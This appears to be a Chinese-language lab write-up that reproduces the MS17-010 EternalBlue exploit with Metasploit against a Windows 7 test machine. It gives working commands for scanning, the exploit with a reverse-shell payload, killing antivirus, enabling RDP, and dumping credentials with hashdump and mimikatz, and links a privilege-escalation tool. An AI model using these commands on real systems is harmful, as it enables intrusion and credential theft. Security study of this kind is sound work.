Metersploit 集成了滲透階段的全部利用,從漏洞探測,到漏洞利用,最后到后滲透階段。本次博客主要拋磚引玉,通過對MS17_010漏洞的復現,來學習Metasploit。
漏洞環境:
靶機:windows 7 (192.168.0.135)
攻擊機:kali 2018 (192.168.0.133)
開始之前先來熟悉 Metaspolit 基本術語:
Auxiliaries(輔助模塊),Exploit(漏洞利用模塊),Payload(攻擊載荷模塊),Post(后期滲透模塊),Encoders(編碼工具模塊)
1.加載smb掃描模塊
msf > search auxiliary/scanner/smb
發現可利用的smb_ms17_010模塊
2.加載漏洞掃描模塊對ip段進行漏洞掃描:
msf > use auxiliary/scanner/smb/smb_ms17_010
msf > set rhosts 192.168.0.100-150
msf > set threads 10
msf > run
發現 192.168.0.135 這台主機可能存在MS17_010漏洞
3.利用nmap對漏洞主機進行探測:
msf > nmap -T4 -A 192.168.0.135
發現敏感端口139,445開啟
4.搜索MS17_010可利用漏洞模塊
msf > search ms17_010
(沒有的話 git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git)
5.加載漏洞利用模塊,設置參數
msf > use exploit/windows/smb/ms17_010_eternalblue
msf > set lhost 192.168.0.133
msf > set rhost 192.168.0.135
msf > set payload windows/x64/meterpreter/reverse_tcp
msf > exploit
可以看到漏洞利用成功,現在是 system 最高權限
6.信息查看
進程遷移:
因為shell都是不穩定的,所以需要找到一個可靠的進程,遷移過去:
migrate 要遷移的進城號
查看系統信息:
meterpreter > sysinfo
查看是否為虛擬機:
meterpreter > run post/windows/gather/checkvm
查看目標機運行時間:
meterpreter > idletime
查看完整網絡設置:
meterpreter > route
關閉殺毒軟件:
meterpreter > run post/windows/manage/killav
啟動目標機的遠程桌面協議,開啟3389端口:
meterpreter > run post/windows/manage/enable_rdp
可以看到已經成功啟動了遠程桌面。
列舉當前登陸過的用戶:
meterpreter > run post/windows/gather/enum_logged_on_users
可以看到有 SecEvery,Administrator兩個用戶。
列舉安裝在目標機上的應用程序:
meterpreter > run post/windows/gather/enum_applications
將當前Meterpreter終端隱藏在后台:
meterpreter > background
需要重新調用終端:
meterpreter > sessions -i 1
很多用戶習慣將計算機設置為自動登陸,下面這個命令可以抓取自動登陸的用戶名和密碼:
meterpreter > run windows/gather/credentials/windows_autologin
下載c盤下1.txt文件到/home目錄下:
meterpreter > download c:\txt /home
上傳/home目錄下1.txt文件到c盤下:
meterpreter > upload /home/1.txt c:\
密碼抓取:
1.使用Hashdump抓取密碼
Hashdump Meterpreter腳本可以從目標機中提取Hash值,破解Hash值即可獲得登陸密碼。計算機中的每個賬號(如果是域服務器,則為域內的每個賬號)的用戶名和密碼都存儲在sam文件中,當計算機運行時,該文件對所有賬號進行鎖定,要想訪問就必須有“系統級”賬號。所以要使用改名了就必須進行權限提升。
在Meterpreter Shel提示符下輸入hashdump命令,將導出目標機sam數據庫中的Hash:
2.使用Mimikatz抓取密碼
加載mimikatz模塊:
meterpreter > load mimikatz
看了大概使用方法后,既可以使用Metasploit內建的命令,也可以使用Mimikatz自帶的命令從目標機器上導出Hash和明文證書。
抓取系統Hash:
meterpreter > msv
md5解密:
抓取系統票據:
meterpreter > kerberos
獲取系統賬戶信息:
----------------------------------------------------------------------------------
emmmm....為了給這篇文章增加一點營養,這里另附使用MS16_032對 windows 2003 進行溢出提權:
另附ms16_032提權小工具:
https://pan.baidu.com/s/141N6rXVO7mGvuXfp5UzzBA
提取碼:yavh 解壓碼: 96sec.org
參考鏈接:
https://www.cnblogs.com/lsgxeva/p/8450277.html